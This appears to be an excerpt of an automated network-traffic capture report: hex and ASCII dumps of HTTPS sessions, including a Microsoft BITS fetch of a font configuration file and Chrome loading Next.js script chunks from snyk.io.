                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC16384INData Raw: 13 8f b6 6b 91 16 6e fa fd 15 e2 3a b5 c4 e5 1d 10 d0 6a 09 19 66 38 69 6d 8a 6d 35 5f 39 19 5e 6b 7f 14 90 f5 db 01 4a d9 a2 44 0b 1a 92 47 c4 2c 71 cb f4 12 bc 2b b9 13 b1 e5 57 18 5c 66 76 01 57 fc fc 02 b1 5d b0 fc 02 bb 0a 2e 3d 64 45 56 5e 0d 57 7d 44 c4 22 a6 c6 aa 7c d6 be 78 1a bd b1 5b 62 8d 48 b4 88 b0 98 d0 03 49 24 99 95 d1 58 d0 d1 80 0e fa ab d6 f2 99 c7 37 d8 d3 3e aa d5 4d 2e 69 69 47 d5 70 58 04 a5 2b 82 7b cd fe a4 c5 d4 f2 8f bd 86 a9 e3 3f 35 0b 43 2c cb b2 c2 6d 4a 29 d7 75 60 69 47 8f 62 98 d7 61 9e b0 b3 a3 51 7f 29 31 dc e4 94 96 72 3f d0 f0 df 50 1c 14 58 4a 2d 3d b8 ca cd d4 33 18 87 1a 3f f6 ef 79 73 80 1f d3 6f 2f a3 4a 8a 8b 30 32 98 fc 08 e9 34 7a f1 78 6f d7 9e 2d 50 70 e9 c9 62 b5 10 05 06 11 c6 cb ea 70 01 02 4c 86 35 e1
                                                                                                                                                                                                                                                                                                              Data Ascii: kn:jf8imm5_9^kJDG,q+W\fvW].=dEV^W}D"|x[bHI$X7>M.iiGpX+{?5C,mJ)u`iGbaQ)1r?PXJ-=3?yso/J024zxo-PpbpL5
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC8192INData Raw: e0 1d 4e a0 9d e4 07 fb 26 ff 0c 70 83 af ee 09 6e 1a 1a ba 6d fd 52 8d 55 45 b1 9c 01 5d 14 65 55 cf 29 00 2d b7 58 49 09 02 8c f5 57 a0 c0 1a bf ba 6d 73 a0 07 1d e0 3f ce af e6 93 2c 99 d4 0e e8 48 a3 75 2a 09 b6 7a ca 3c a8 d2 27 92 8a c6 42 ed 4c b2 5c 92 ad 21 8d 10 a7 89 77 ae 2a 8b ca 29 b5 44 da 0c 69 3f be 43 ea b2 dc 1d 95 4f 11 aa 62 43 13 c2 9a 37 96 94 91 2f 0f 09 e7 d1 09 70 0b b9 5f ba fd 40 0c 0b bb 1c 7d 26 f9 3d 39 b9 3a c1 82 ca 72 ee 86 6a 2f 9c 03 e7 75 b4 46 b3 83 97 7f 14 b7 28 5c c5 5e 2e d3 8a 4b 44 e9 9e 3e 10 5b 44 98 62 d1 5a 9a a5 79 e1 8c 70 88 46 0f 07 b4 a4 49 98 e7 ce 4e 1e fe de 51 e0 93 63 78 cb 3b 1e 50 60 3f e1 bd 71 83 2d 8e 05 ea eb 04 58 b7 09 5a 4f 7e 89 af 8d 95 6d c4 97 c3 cf d8 c9 4f 93 38 c0 07 0e 3d c0 bd 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: N&pnmRUE]eU)-XIWms?,Hu*z<'BL\!w*)Di?CObC7/p_@}&=9:rj/uF(\^.KD>[DbZypFINQcx;P`?q-XZO~mO8=.
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC8192INData Raw: e5 8c e8 59 77 2c 87 05 b1 96 cd 68 8e e8 04 fb 9e 06 3f a0 c3 c6 cd 2e c1 ac c4 2b 60 6a ff 26 1b cb 8e 5b 73 79 23 c5 6d f2 77 83 a7 21 93 13 bc 58 60 32 b8 7f 1a 11 7e dd 2f c8 22 4f b8 0c 45 0f 40 fc fb 82 00 e6 26 24 09 3d 7b 6e 8d 64 74 85 d1 94 ee e2 ab d5 b9 29 9e 35 5c 6a d9 6c 64 49 14 f3 d4 a2 c6 84 66 0d ce 89 e0 a9 99 24 67 3e bf 14 09 06 5c d1 13 f6 04 b3 23 4c fc e2 15 9f 00 b3 6c 3e 33 be 1c 81 2e 4e 16 e0 f1 bd 0c 18 97 d2 fd e7 1e 60 38 d7 f0 d9 c3 eb 9f 1e 7e 39 24 6e 3f 2d bb 00 b7 02 ec d2 c0 ed 40 0e 2a c3 fa 4c dd 48 4f 4e 39 0c ed 4a 29 87 26 53 fa b9 94 a6 c1 e4 03 63 04 2b 6d 0a 6e bb fa 2b 13 ba d9 92 14 e3 58 e2 04 7b 4b 7a 63 ce f4 82 06 b3 67 eb 72 44 0a ad 5f 8c ed 88 86 c7 6d f4 ea d0 04 85 da 6c e6 5c 8f d5 4b 26 b5 66 f4
                                                                                                                                                                                                                                                                                                              Data Ascii: Yw,h?.+`j&[sy#mw!X`2~/"OE@&$={ndt)5\jldIf$g>\#Ll>3.N`8~9$n?-@*LHON9J)&Sc+mn+X{KzcgrD_ml\K&f
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC16384INData Raw: 7e d7 8b a2 07 97 cc 86 b9 a4 87 1c 40 8b fe 72 02 ac e2 4b f4 82 df 19 3c 9a 51 74 41 ef 70 34 9d 1a 2e a7 e9 b1 31 6d 31 b4 9c a6 26 8d 96 a1 c1 43 6a 00 a2 c0 d0 60 42 b8 d5 11 0d 82 15 62 cb 82 2d 8e b6 30 fa 8c f3 60 55 60 36 a3 51 4d 22 86 8f 8f 5f b3 9d 25 91 b3 7a d2 46 ab 4a 71 42 58 91 66 91 a6 20 fa f8 47 8a 9e bf 4b 9d 1c ea 64 fd 4a 0c c3 cd 0a 17 27 c2 aa a0 4e b0 91 ec 57 93 5d 08 30 ad 0a 08 51 f4 35 3b 58 1a 40 bb 89 f5 0a 31 b4 d2 eb 11 b4 2c b4 93 69 e0 d4 47 59 44 d0 cd a5 b2 cc 6c d9 d5 11 9b 38 70 35 f3 5f 06 38 5d 55 f8 2c 67 df 9a 1a a7 31 89 f4 b2 bf 2b 2e d6 9e 75 3d 23 7e 9e 9d 93 21 25 31 47 ad 7b 28 34 50 5a 13 96 8f 01 67 03 1a bd 1b f7 81 dd 47 ba d0 c5 7e 8e 81 6e 0e 5f c9 e1 0f ef 9e 24 7e b9 00 cc 65 5f 7b 5b 55 86 35 94
                                                                                                                                                                                                                                                                                                              Data Ascii: ~@rK<QtAp4.1m1&Cj`Bb-0`U`6QM"_%zFJqBXf GKdJ'NW]0Q5;X@1,iGYDl8p5_8]U,g1+.u=#~!%1G{(4PZgG~n_$~e_{[U5
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC16384INData Raw: df e5 79 4e 7f 57 63 ef a4 14 8f 0a 78 71 6d 64 7a 37 b6 37 00 30 e9 ae ec 9f e1 6a 8a 2c 9e 94 3e 08 7e 16 b3 f7 5c 64 c0 5a d6 c9 96 f3 34 72 03 bc e8 f6 61 88 f3 f3 ff af 06 d4 ad 0a 53 44 f8 fb d1 cc 80 04 73 cb 0a 6f 2c 20 09 96 d8 23 0e 5e f1 8f 52 1a b2 90 04 d3 19 7d f2 bf bf 2c 62 68 8b a3 55 84 43 1a dc 08 a4 b3 fe 9a 4a a6 9a 53 40 9e 36 c7 6b 13 b4 4a b0 d1 5b 61 bc 9e 43 e8 26 be c3 02 1c ea ef 29 7c d6 83 19 90 01 33 be e0 b7 6c c0 2a f8 9d 1b 51 f8 6c 01 74 47 85 d3 6c 61 77 34 e9 e3 d4 4a 70 af 1f 4b 1e 3c 10 bc e0 77 42 e7 79 92 3d 3c 99 14 f2 eb 12 dc 28 06 87 c6 ca a1 8b 8a 47 b3 c4 6f 58 7d c5 f2 8b f2 2f ba 37 56 6a fd 0d cf e6 f5 83 f5 83 f3 44 2f ee a0 c0 d8 3e 83 0a 1e 6f b3 90 ca 11 cb 2f 27 39 14 42 7e 5f d8 57 45 8b 45 d0 de 0e
                                                                                                                                                                                                                                                                                                              Data Ascii: yNWcxqmdz770j,>~\dZ4raSDso, #^R},bhUCJS@6kJ[aC&)|3l*QltGlaw4JpK<wBy=<(GoX}/7VjD/>o/'9B~_WEE
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC8192INData Raw: d8 51 ac d3 6e b1 c2 4c 03 e0 f0 e0 30 47 e7 68 b1 09 00 ab 82 a6 10 38 fb 90 9c 7f 71 8a 14 12 c3 b7 19 c6 e1 07 d9 2b 91 07 ce 35 0c 34 0b da b7 74 b4 1e 34 27 81 c5 c4 ca 55 a2 0a 61 5a d9 3b cc 01 77 d0 b5 a2 0c 47 e9 fb d4 ce 72 4d 4e 46 bf 06 df c0 f1 7a 44 fc e2 dd 8b 77 0a e0 41 14 9c 9d 49 6b ba 59 13 3a 7a 88 e1 a2 a3 1d bf 9a 58 2a bb d0 32 14 9e 4d 2c 95 e4 92 81 17 f2 c9 2f a5 77 41 a8 57 f7 7c cb 30 95 04 70 89 7e 2f 2a 7e 43 3e 83 7e 55 3e 87 80 fe 5b 62 98 4a 3a d6 6a 2c 74 41 ed f2 f9 f9 23 2d 33 d2 57 a7 b1 57 b0 96 96 59 05 7a f5 5c 89 d8 58 d7 72 c1 17 67 07 42 bf aa 9e 83 80 55 4d 27 7a 19 c2 80 b8 5a 5d 5d 78 fc fb 3f ff e3 df ff fd 3f ff e7 f7 e7 7f d1 c2 4b db b8 e0 1b 7f 95 7d e5 43 26 e7 68 f9 86 2d ef c6 f8 67 5f b5 e6 55 58 c9
                                                                                                                                                                                                                                                                                                              Data Ascii: QnL0Gh8q+54t4'UaZ;wGrMNFzDwAIkY:zX*2M,/wAW|0p~/*~C>~U>[bJ:j,tA#-3WWYz\XrgBUM'zZ]]x??K}C&h-g_UX
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC16384INData Raw: 71 44 1d 07 a7 81 dd c3 fa fe b6 ec 34 23 07 cb f0 db 60 58 29 58 11 ec db 07 3b 0c d7 c6 41 2e 86 e6 83 c9 97 6f 02 be 1a 06 0b 74 35 2e 96 63 b1 3d a5 9f bd b9 70 3e 9b 34 d3 e3 3f 2e eb 48 f4 4e 8d cc 0a f0 76 c5 95 ae a3 3d fc f5 46 60 87 30 06 eb 48 7f 92 45 bf e7 da 8d 37 a0 df 33 2d e4 30 f9 4c 0a 9a 0c e8 39 37 9a c6 45 37 f2 d9 4b 9f 7d eb 51 be d2 c0 bf 14 07 08 78 e5 23 08 f8 58 3e cf cf 8f 2f b5 76 23 c4 b3 9b d0 de 49 58 87 51 aa 7b 25 03 a6 04 17 02 e1 f9 1c b0 4a 67 21 44 f2 b0 16 9b cf 17 6e 4c 25 7c 23 14 2e f5 57 44 c2 d7 87 6a b6 17 f5 8c cf 16 c3 70 e0 f2 49 78 2f 03 c7 c1 8d 09 1d 6b 88 b5 14 cb 18 d8 26 80 64 3b ff fe a4 0b 1d a5 94 59 06 4d 3e 34 a6 71 74 1e d6 ad 36 31 34 d3 38 ac 0c 2b 3c ac b6 10 da c0 4b eb 7d 47 31 70 62 36 63
                                                                                                                                                                                                                                                                                                              Data Ascii: qD4#`X)X;A.ot5.c=p>4?.HNv=F`0HE73-0L97E7K}Qx#X>/v#IXQ{%Jg!DnL%|#.WDjpIx/k&d;YM>4qt6148+<K}G1pb6c
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC8192INData Raw: b1 67 82 91 0a 96 e1 a3 5e 4b 29 7b eb b8 25 e9 85 71 30 58 18 15 59 99 09 36 15 4d 29 e1 a0 61 6b 11 56 4f fa ab 51 3c 09 e0 52 1c 5d 3a 0d 1f 40 c2 85 8f 3b 5d cd 4e d7 7a 73 00 68 02 00 e5 74 03 a3 86 e3 14 d1 a1 ab 39 18 76 04 1b f9 e2 cc 29 d8 b3 48 c2 c1 9c 0c 2e 0c 7b e4 d4 8c cb a5 5f ad 47 d9 9f 70 d6 82 b7 c9 82 d2 7d cb 2f 03 6f 8b b5 72 9b 2e f5 ba bb 74 b8 d3 5c bb 38 f3 f7 02 ba 55 41 1b 04 3e 89 de f8 5b 91 9f 35 86 b0 e3 b8 e1 e0 91 92 66 33 7a 58 19 7d 13 bd 49 3a 5c 07 73 a2 e3 28 13 a2 df c4 6c 4a 2b e5 88 44 b0 4d b6 03 84 73 b4 9d fa 58 ee 44 5b 39 07 aa 39 2c 17 ac 1a fa 85 cb 67 cf 22 b9 92 f6 7a 0e 13 d2 de e2 90 6d 0e 5f 74 9c 3c 5e ec 3c ea a2 e0 d0 d1 81 e2 98 1c bd ce d8 9d 1e c4 0c 5d 32 a7 e3 ce 16 c3 2b c2 61 6f 3d cc 48 38
                                                                                                                                                                                                                                                                                                              Data Ascii: g^K){%q0XY6M)akVOQ<R]:@;]Nzsht9v)H.{_Gp}/or.t\8UA>[5f3zX}I:\s(lJ+DMsXD[99,g"zm_t<^<]2+ao=H8
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC1241INData Raw: c9 87 66 25 74 67 8d 15 e1 37 71 47 d7 a8 68 ec 5f 98 a3 64 61 6b f0 f0 d5 33 ec 1e ec dd 92 3e f6 dc db 82 21 aa 12 ac e8 c0 77 6a 55 4a 84 6b c7 61 f7 6f 5d 57 66 da dd 00 36 2b 3a 42 3a ae 62 0c 94 62 6b 53 13 4f 72 56 83 37 8b 03 45 0a b3 54 42 d8 ca 16 e1 8d af a4 04 e1 bd 7c b9 ef e4 06 d8 f4 d8 70 56 a6 83 6b 49 de f6 1f 78 ba 7c 4a 9f d7 ed b6 64 d6 c4 65 92 f5 3d 76 51 25 d1 6d ba b6 2f e4 ec b0 10 36 ce 80 c6 4c 12 84 4d 6d a3 88 e8 f9 55 6d 2d c5 17 e8 67 1f c5 38 92 7b b2 ca c2 a4 c4 ad 73 f3 d4 a6 c4 a6 f4 d8 a2 44 1d 1c 7c ca 6a f0 df 5d 81 a5 3d a9 0e 73 d7 82 3a ac 5f c3 8e e8 68 9e e8 43 64 f4 29 ba b2 93 ac c0 56 8b ba f8 ab 2d 81 fb 78 c2 f2 40 d2 dd 0b 1d 96 74 b4 0a 5f b2 a2 1d 31 72 68 c5 97 5a 3a d5 a8 c9 09 7e 41 16 8a 83 ce b1 ac
                                                                                                                                                                                                                                                                                                              Data Ascii: f%tg7qGh_dak3>!wjUJkao]Wf6+:B:bbkSOrV7ETB|pVkIx|Jde=vQ%m/6LMmUm-g8{sD|j]=s:_hCd)V-x@t_1rhZ:~A


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              16192.168.2.549724184.28.90.27443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                              If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                              Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                              Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                              ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                              Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                              X-CID: 11
                                                                                                                                                                                                                                                                                                              X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                              X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=248205
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:57 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 55
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-CID: 2
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                              Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              17192.168.2.54973423.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:57 UTC375OUTGET /_next/static/chunks/8796.579c4548d83cb2ef.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="8796.579c4548d83cb2ef.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"3157cfe467f518fa1b9e43042fd8985f"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:49 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/8796.579c4548d83cb2ef.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::mwm7p-1729257049193-d2a111594bd6
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:57 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 1896
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799337.1091005
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC1896INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 38 37 39 36 5d 2c 7b 39 36 30 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 61 29 7b 61 2e 64 28 69 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 3b 76 61 72 20 65 3d 61 28 38 35 38 39 33 29 2c 6e 3d 61 28 34 35 36 39 37 29 2c 72 3d 61 2e 6e 28 6e 29 2c 73 3d 61 28 37 37 35 36 29 2c 74 3d 61 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6c 29 7b 76 61 72 20 69 3b 6c 65 74 7b 69 6d 61 67 65 3a 61 2c 69 73 53 6d 61 6c 6c 3a 6e 2c 68 61 73 4d 69 6e 48 65 69 67 68 74 3a 72 2c 6f 62 6a 65 63 74 46 69 74 3a 6f
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8796],{96059:function(l,i,a){a.d(i,{Z:function(){return c}});var e=a(85893),n=a(45697),r=a.n(n),s=a(7756),t=a(44133);function o(l){var i;let{image:a,isSmall:n,hasMinHeight:r,objectFit:o


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              18192.168.2.54973623.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC516OUTGET /_next/static/chunks/5030.3b020cf8ffddffa3.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="5030.3b020cf8ffddffa3.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7df67dde87fa6d7cf73573588d4bcb3d"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/5030.3b020cf8ffddffa3.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::vbhk7-1729257050695-b2432632d8b0
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 9887
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799338.1f601e8
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC9887INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 30 33 30 5d 2c 7b 36 35 38 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 6f 3d 61 28 38 35 38 39 33 29 2c 72 3d 61 28 34 35 36 39 37 29 2c 69 3d 61 2e 6e 28 72 29 2c 6e 3d 61 28 36 34 31 31 39 29 2c 73 3d 61 28 31 35 30 32 30 29 2c 6c 3d 61 28 36 32 31 35 29 2c 63 3d 61 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 76 61 72 20 74 2c 61 3b 6c 65 74 7b 63 6f 6c 6f 72 53 63 68 65 6d 65 3a 72 2c 63 6c 61 73 73 4e
                                                                                                                                                                                                                                                                                                              Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5030],{65840:function(e,t,a){a.d(t,{Z:function(){return u}});var o=a(85893),r=a(45697),i=a.n(r),n=a(64119),s=a(15020),l=a(6215),c=a(44133);function d(e){var t,a;let{colorScheme:r,classN


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              19192.168.2.54974023.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC375OUTGET /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              Content-Disposition: inline; filename="9875.8b3ce8ccbc1ad2ec.js"
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                              ETag: W/"7342546a5d5f4f44c1f41779b7d84698"
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 18 Oct 2024 13:10:50 GMT
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/static/chunks/9875.8b3ce8ccbc1ad2ec.js
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: HIT
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::8vssc-1729257060048-bae87a8569c0
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:48:58 GMT
                                                                                                                                                                                                                                                                                                              Content-Length: 9671
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799338.1091255
                                                                                                                                                                                                                                                                                                              2024-10-24 19:48:58 UTC9671INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 38 37 35 5d 2c 7b 37 33 33 35 39 3a 66 75 6e 63 74 69 6f 6e 28 6c 2c 69 2c 65 29 7b 65 2e 64 28 69 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 29 3b 76 61 72 20 6f 3d 65 28 38 35 38 39 33 29 2c 6e 3d 65 28 34 35 36 39 37 29 2c 64 3d 65 2e 6e 28 6e 29 2c 61 3d 65 28 34 34 31 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 74 28 6c 29 7b 6c 65 74 7b 6c 61 62 65 6c 3a 69 2c 63 6c 61 73 73 4e 61 6d 65 3a 65 7d 3d 6c 3b 72 65 74 75 72 6e 28 30 2c 6f 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c
